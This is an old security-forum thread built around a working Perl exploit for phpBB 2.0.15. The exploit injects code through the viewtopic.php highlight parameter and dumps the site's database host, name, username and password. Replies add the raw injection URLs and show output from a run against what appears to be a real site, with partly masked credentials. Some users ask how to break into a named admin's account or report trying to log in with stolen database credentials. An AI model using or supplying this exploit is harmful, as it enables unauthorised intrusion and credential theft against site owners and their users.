|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PhpBB 2.0.15 Database Authentication Details Exploit |
|
Posted: Mon Jul 04, 2005 12:55 pm |
|
|
mauroni |
Beginner |
|
|
Joined: Jul 02, 2005 |
Posts: 2 |
Location: Poland |
|
|
|
|
|
|
Code: | #!/usr/bin/perl
# tested and working /str0ke
# ********************************************************************
# **********************************************************************
# **** **
# *** ****** ******************* **
# *** *** **** *********************** **
# *** *** **** **** * *** ***** **
# *** *** *** *** *** * ** ** ** **
# *** *** *** ** ** ** ** **
#*** *** *** *** ** ** ***** **
#** *** *** **** ** ** ** **
#** *** *** *** ******* ******* ** *** ** **
#** *** *** *** ** *** *** ** ** ** ** **
#** *** *** *** ** *** *** *** ***** **
#** *** *** *** ** *** *** **
#** **** *** **** *** *** **
#** ******* **** ******** *********************************** **
#** *** **
#** *** **
#** **
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
#** This exploit gives the user all the details about the database **
#** connection such as database host, username, password and **
#** database name. **
#** **
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 **
#** **
#** Greetings to GvR, Jumento, PP, CKrew & friends **
#** **
#*****************************************************************************
# ***************************************************************************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
} |
|
|
|
|
|
|
|
|
|
Posted: Mon Jul 04, 2005 4:39 pm |
|
|
KingOfSka |
Advanced user |
|
|
Joined: Mar 13, 2005 |
Posts: 61 |
|
|
|
|
|
|
|
have someone tryied it ? i'm testing on one of my forum but it seems not to be working.. i'm looking at the code... |
|
|
|
|
Posted: Mon Jul 04, 2005 5:04 pm |
|
|
MrX |
Regular user |
|
|
Joined: May 10, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Mon Jul 04, 2005 5:12 pm |
|
|
sepalot |
Beginner |
|
|
Joined: Jun 22, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
doesnt work on the forums <=2.0.15 where i tested it on |
|
|
|
|
Posted: Mon Jul 04, 2005 5:18 pm |
|
|
KingOfSka |
Advanced user |
|
|
Joined: Mar 13, 2005 |
Posts: 61 |
|
|
|
|
|
|
|
this should work only for phpBB 2.0.15 , not <= 2.0.15 , but i'm testing locally and i've got no result:
Code: |
gentoo root # ./db.pl 127.0.0.1 /phpBB2/ 1
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit FAILED
gentoo root #
|
while the command execution works perfectly |
|
|
|
|
|
|
|
|
Posted: Mon Jul 04, 2005 5:18 pm |
|
|
MrX |
Regular user |
|
|
Joined: May 10, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
./l00ser.pl www.giorgioXXXX.it /forum/ 1396
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: giorgioXXXX248
[+] Username: WA_00XXXX
[+] Password: ciaoXXXX |
|
|
|
|
Posted: Mon Jul 04, 2005 6:38 pm |
|
|
mauroni |
Beginner |
|
|
Joined: Jul 02, 2005 |
Posts: 2 |
Location: Poland |
|
|
|
|
|
|
Only phpbb 2.0.15
viewtopic.php?t=25878&highlight='.printf($dbhost).'
viewtopic.php?t=25878&highlight='.printf($dbname).'
viewtopic.php?t=25878&highlight='.printf($dbuser).'
viewtopic.php?t=25878&highlight='.printf($dbpasswd).' |
|
|
|
|
Posted: Tue Jul 05, 2005 7:51 am |
|
|
KingOfSka |
Advanced user |
|
|
Joined: Mar 13, 2005 |
Posts: 61 |
|
|
|
|
|
|
|
i've tryed exploiting using others method like the one described by Maroni and they works locally , but what about using system ? i tryied adjusting Zeelock exploit for this version but i can't make it work.. |
|
|
|
|
Posted: Fri Jul 08, 2005 1:31 pm |
|
|
SecureD |
Beginner |
|
|
Joined: Jul 08, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
When phpbb is patched it wont work. Much phpbb owners patch the code for them selves without changing the version number. This will result in a old version number with an up2date phpbb version. |
|
|
|
|
Posted: Tue Jul 12, 2005 9:37 am |
|
|
diaga |
Regular user |
|
|
Joined: Jun 27, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
The exploit goes through, but i'm getting blank results? |
|
|
|
|
Posted: Mon Sep 19, 2005 1:52 pm |
|
|
robin1200 |
Regular user |
|
|
Joined: Sep 13, 2005 |
Posts: 19 |
|
|
|
|
|
|
|
I finally got this exploit to work on a site, however, I have not been able to connect to the database, I am getting a connection refused or not authtorized, I have already tried to connect via ssh with no avail..
any other options, last time I checked the fourm sill had the same user, dabase and pass
thanks
Robin |
|
|
|
|
Posted: Mon Sep 26, 2005 6:42 pm |
|
|
Alex_Gutsy |
Beginner |
|
|
Joined: Jul 20, 2005 |
Posts: 4 |
Location: Lithuania |
|
|
|
|
|
|
Hey, I don'tunderstant in this code anything... maybe you can say how it do, when I want to hack http://www.david-thewlis.com/davidforum forum, Name Margot ... She's admin... User number 2 ... how can I loggin in her??? Please, say what to do, where to post and else. I'm noob... THNX! |
|
|
|
|
Posted: Wed Sep 28, 2005 12:07 am |
|
|
Pi0u |
Regular user |
|
|
Joined: Sep 23, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Alex_Gutsy wrote: | Hey, I don'tunderstant in this code anything... maybe you can say how it do, when I want to hack ************************** forum, Name Margot ... She's admin... User number 2 ... how can I loggin in her??? Please, say what to do, where to post and else. I'm noob... THNX! |
Please delete your target ...
and .. phpBB 2.0.16 CHANGELOG
2.0.15 Hack doesn't Work |
|
|
|
|
Posted: Mon Jul 10, 2006 3:42 pm |
|
|
superninja |
Active user |
|
|
Joined: Jul 03, 2006 |
Posts: 38 |
|
|
|
|
|
|
|
where must i write this code |
|
|
|
|
Posted: Mon Jul 10, 2006 6:09 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|